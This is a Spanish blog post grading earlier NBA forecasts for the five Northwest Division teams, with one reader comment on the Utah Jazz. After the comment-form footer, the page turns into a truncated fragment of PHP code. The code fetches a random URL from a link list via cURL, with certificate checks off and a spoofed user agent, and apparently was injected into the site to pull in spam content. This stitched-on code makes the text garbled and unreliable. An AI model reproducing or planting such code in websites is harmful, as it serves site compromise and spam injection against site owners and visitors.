Revisando pronósticos: Northwest

21 de February de 2014 por TheDeerHunter

DENVER NUGGETS

Pronóstico Septiembre 2013: Victoria arriba/victoria abajo estarán más o menos en el 50% pero fuera de los Play Off. Seguirán siendo de los mejores equipos de la liga en casa.
Probabilidad de acierto: Media
Calificación pronóstico: C-

Me gusta mucho el título de aquel análisis: “Espectáculo garantizado”. Buen reflejo de lo que está siendo su temporada aunque no creemos que fuera el sentido que buscaba el autor. Como este año nadie podía predecir qué versión íbamos a ver de los Nuggets había un punto de intriga bastante especial. Espectáculo garantizado sí pero sin saber si va a ser del fabuloso o del lamentable. Podemos alternar entre victorias brillantes como las conseguidas frente a Clippers o Pacers hace unos días con un capazo de derrotas seguidas encajando 120 puntos por noche. Todo sin inmutarse. No existe patrón ni tendencia. Las dos caras de una misma moneda.

Eso de estar más o menos en el 50% de victorias pero fuera de playoffs está clavado. Todo indica que, racha arriba, racha abajo, es lo que habrá al final de temporada. Como comentábamos era un poco inevitable reimpulsar un proyecto algo estancado, aunque fuera a costa de dar un paso hacia atrás, pero no atinamos con lo de que iban a seguir siendo uno de los mejores en su pabellón. La irregularidad de su juego también se ha trasladado al calor del Pepsi Center.

Es complicado señalar causas concretas de un comportamiento tan errático. La salida de Ujiri no debía de afectar tan a corto plazo. Se nota más el cambio de sistema. “El alumno más aventajado del maestro Zen” no ha logrado parecerse a su mentor. Es razonable echar en falta la aportación de gente como Iguodala o de los lesionados Gallinari y McGee. Nate Robinson también se rompía cuando venía haciendo otra meritoria campaña. Otros como Andre Miller, Arthur, Randolph y Fournier han caído en desgracia en estos nuevos tiempos que corren.
El resto, más o menos aporta lo esperado. No hay mala base pero no es suficiente para plantear batalla en este salvaje Oeste. Va a ser interesante comprobar como se mueven en el futuro inmediato. 

MINNESOTA TIMBERWOLVES

Pronóstico Septiembre 2013: Peleando playoffs. 42-48 victorias.
Probabilidad de acierto: Baja
Calificación pronóstico: D+

Decepción. No tanto por no alcanzar nuestras previsiones como por las sensaciones que deja un proyecto que parece ir a la deriva y que tantas simpatías despertara en su momento. Se entienden ahora ciertos exabruptos que lanzó Adelman en pretemporada. No le gustó lo que vió en su plantilla al volver de vacaciones.

Pensándolo fríamente, tal y como se ha puesto el Oeste, los Wolves tampoco tenían demasiadas opciones de asegurar postemporada. Ni siquiera esas 48 victorias que poníamos como “best case” son una garantía. Tampoco será fácil que firmen 42 aunque es un número por el que se han venido moviendo todo el curso. Un balance que sólo les valdría para pelear playoffs en la otra conferencia.

Las razones de que el equipo no termine de funcionar son variadas:

El sistema defensivo no está a la altura del resto de facetas del juego, donde por cierto destacan. Adelman rara vez ha logrado dotar de alma defensiva a sus equipos y las características de la plantilla tampoco le favorecen. Algunos apuntan directamente a la contribución (o mejor dicho, la no contribución) de Kevin Love en ese aspecto. Por otro lado se aprecia un problema crítico con la contribución del banco. Existe una diferencia brutal entre el quinteto titular y los suplentes. El asunto se agrava cuando hay que decidir entre la dirección y defensa de Ricky o el impacto ofensivo de Barea. Por desgracia son excluyentes y la decisión marca radicalmente el carácter del equipo, especialmente atacando. Podemos decir que los Wolves sufren una especie de trastorno bipolar y mucha culpa la tiene el catalán que no ha logrado desarrollar su tiro como debería.

Da la impresión de que,  exceptuando a Martin, Brewer, Love y Pekovic, muchos jugadores no terminan de rendir del todo, . Una lástima el caso Derrick Williams que terminó regalado y los de Muhammad o Shved, que van por el mismo camino. Algunos se atreven a insinuar que Love empieza a tener la cabeza en otros lugares. Si esto sigue en esta línea no habría que reprochárselo.

En conclusión, no era fácil de prever el desequilibrio de victorias que se iba a producir entre conferencias. Normalmente el 50% suele marcar la criba en ambas. Hoy en el Oeste la 8ª plaza roza el 60%. En condiciones normales nuestro pronóstico no hubiera sido del todo malo. Los Wolves tienen trabajo para reconducir la situación.

OKLAHOMA CITY THUNDER

Pronóstico Septiembre 2013: Cerca de 55 victorias. 1º en la Northwest. 2º/3º del Oeste. Finalistas de conferencia.
Probabilidad de acierto: Media-Baja
Calificación pronóstico: D+

Nuestra principal preocupación en Septiembre era el nivel general de la plantilla. Apreciamos que, sin refuerzos propios ante unos rivales directos tremendamente fortalecidos, se veían en la situación más comprometida desde que llegó Durant a la franquicia, siempre con el punto de mira calibrado según los objetivos que se plantean.

No lo vimos venir. Creíamos haber visto a Durantula cerca de su techo, un techo ya de por sí altísimo. Siempre le tuvimos como un anotador extraordinario, uno de los mejores que hayamos visto nunca. Su evolución a jugador total “LeBronizado” es increíble, cualquier expectativa se queda corta. Su excelencia logra que el equipo “vulnerable” que presentábamos, con un jugador de calibre all-star como Westbrook en el dique seco la mayor parte de la temporada, domine con puño de hierro la durísima conferencia Oeste. ¿Cuantas más victorias tendrían en el Este?

No todo es mérito de Durant, por supuesto. Ibaka ha rendido a un nivel altísimo, Reggie Jackson viene cubriendo con dignidad la baja de Westbrook, los jóvenes, por primera vez, son claves en los esquemas de Brooks… En realidad la preocupante pregunta que hay que hacerse es: “¿es mejor Durant y el equipo sin Westbrook al lado?” Si lo pensamos bien nunca han acabado de combinar del todo bien.

En cualquier caso se trata de simples especulaciones, producto de una regular brillante. Cuando verdaderamente se la jueguen es en las eliminatorias, donde pondrán definitivamente a prueba nuestro pronóstico. Nadie en su sano juicio preferiría llegar sin el base estrella a ese momento. Lo que pase entonces lo dictaminarán los dioses del baloncesto.

PORTLAND TRAILBLAZERS

Pronóstico Septiembre 2013: 9º del Oeste. 41-41.
Probabilidad de acierto: Remota
Calificación pronóstico: E

“Difícilmente conseguirán rachas de mas de 5 victorias seguidas” decíamos. Toda una premonición. Parecía que los Blazers querían darnos un “¡Zas, en toda la boca!” cuando comenzaron 13-3, incluida una racha de 11 victorias consecutivas. Supongo que deberían estar acostumbrados ya que son tradicionalmente uno de los equipos más infravalorados de la liga. Sin embargo son una de las sensaciones de la temporada por méritos propios.

Los resultados mandan y salta a la vista que no anduvimos excesivamente finos en nuestra previsión. No obstante, en mi opinión el fondo del análisis iba bastante mejor encaminado de lo que puede parecer.

Los Blazers habían superado por los pelos el 40% de victorias el curso anterior con, probablemente, el equipo más corto de la liga con diferencia. En verano, mientras el nivel medio del Oeste se ponía por las nubes, ello fichaban a un suplente veterano como Mo Williams, a Robin Lopez en sustitución de J.J. Hickson, a McCollum porque a algún rookie había que elegir y a un puñado de secundarios que ya entonces parecía que venían a hacer bulto. Todo añadido a un eje de jugadores que, quitando quizá a Lillard, contaban con pocas opciones de sorprender a nadie. Objetivamente no era un panorama demasiado halagüeño pero todo ha salido demasiado bien. Alrededor de sus dos flamantes all-stars, Lillard y Aldridge (que también sonaba para el MVP) los Blazers se han convertido en una auténtica bomba anotadora. Todo con una rotación de 6 hombres. Dicho de otro modo, siguen siendo el equipo más corto de la liga y Stotts comienza a recordar al mejor D’Antoni sacando petróleo de ellos. Cuesta creer que los resultados (y su juego) estén siendo tan buenos.

Lo positivo es el inmejorable rendimiento de esa columna vertebral de 6 tíos. Lillard-Matthews-Batum-Aldridge-Lopez-Mo Will parece una de esas vetustas alineaciones de futbol que recitaban nuestros abuelos de memoria. Pero el resto todo es negativo: empezando por un McCollum que ha estado lesionado mucho tiempo, siguiendo por Dorell Wright perdido en quién sabe dónde o por los marginados Meyers Leonard, Thomas Robinson y Victor Claver, y acabando con un Joel Freeland que da pocos y malos minutos de descanso a los interiores.

La realidad, a pesar de todo, es que no terminamos de verles como verdaderos candidatos y resulta una incógnita hacia dónde se moverán a medio plazo. Veremos a ver si logran seguir dejándonos en evidencia en los próximos meses.

UTAH JAZZ

Pronóstico Septiembre 2013: 14º del Oeste (24-58)
Probabilidad de acierto: Media
Calificación pronóstico: C+

¿El mejor núcleo joven de la liga? A falta de ver qué es lo que pescan en el sobredimensionado draft de 2014 fácilmente lo pueden ser. De momento el “tankeo” de los chavales ha sido menor que el de los directivos y con un equipo diseñado específicamente para perder casi todos los partidos Tyron Corbin los mantiene por encima de… los Lakers, por ejemplo.

No se puede negar que los Jazz están poniendo dignidad en la faena, especialmente tras la llegada al equipo de un director como Trey Burke. Si bien sus números no son extraordinarios, es evidente la mejoría global del equipo bajo la batuta del base novato. Se comenzó perdiendo 13 de los primeros 15 partidos, pero a partir de ahí y coincidiendo con la llegada de Burke el balance se ha acercado mucho al 50% de victorias. No es casualidad que se le considere como uno de los favoritos al RoY de este año, aunque no lo tendrá fácil para ganarlo.

El resto no es que hayan destacado especialmente desde el punto de vista individual. Quizá esperábamos mayor progresión de Hayward, Favors y sobretodo Kanter, pues Burks sí ha mejorado significativamente su papel de las anteriores campañas. Jeremy Evans también ha entrado en la rotación con eficacia. La gran mejoría de estos jovenes Jazz es colectiva. Defensivamente se mueven en la mitad alta de la liga, cuando normalmente es la cuestión que más cuesta solucionar en grupos tan inexpertos. El problema ha sido el ataque, cosa bastante razonable por otro lado. El equipo es corto de efectivos y de talento. Lógicamente no disponen de una referencia ofensiva de primer orden. Ya llegará.

Es para estar satisfechos. El año que viene tienen los libros limpios de polvo y paja para empezar a ser ambiciosos e incorporaran además a un futuro crack en el “mejor draft tras el de LeBron. Todavía nadie les exigirá nada la próxima campaña. Que no se acostumbren.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    sobre mi análisis del Jazz

    aciertos, considero lo dicho por Burke, ninguna super estrella pero si un solido base titular, Hayward, excelente pero como segunda espada, no tiene lo suficiente como para llevar adelante al equipo por su cuenta, pero al lado de otra estrella podría ser mortal
    Burks, afirmando lo pronosticado, tiene todas las condiciones para ser un sexto hombre relevante en la liga

    desaciertos

    Kaner, una pena pero las posibilidades de ser un centro titular imponente en la liga comienzan a se remotas. Aún así, es un buen jugador y tiene un lugar en el equipo y ha hecho partidos importantes.
    Me lo imaginaba tipo Pekovic en su mejor momento, pero al parecer su comparación en con Pachulia, buen jugador pero no mucho mas
    Favors, no ha cumplido con las expectativas pero tampoco ha defraudado, algo grande su contrato, pero aun sigue siendo joven y puede ser un Ibaka sin problemas

    otro problemita estan siendo tantas victorias, que seguramente se acerquen mucho a las 30 pronosticas, lo que los alejan de Jabari Paker, el alero goleador que les falta y con el cual de aqui a dos años podrian ser la sensacion de la liga

    ANALISIS DE MITAD DE TEMPORADA: la lesión de Burke ayudo por las derrotas iniciales, necesarias para la lotería, pero complico el presente de Kanter, puesto que fue quien pago los plato rotos de tantas derrotas y fue enviado al banco para que williams sea el 4 y Favors es el 5
    en ese momento el equipo comenzó a ganar, pero realmente fue porque comenzó a jugar Burke mas que por el cambio de Kanter, y con las victorias el turco no volvió al 5 inicial, una pena, por que incluso saliendo desde la banca con la llegada de Burke, ha hecho unos muy buenos partidos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>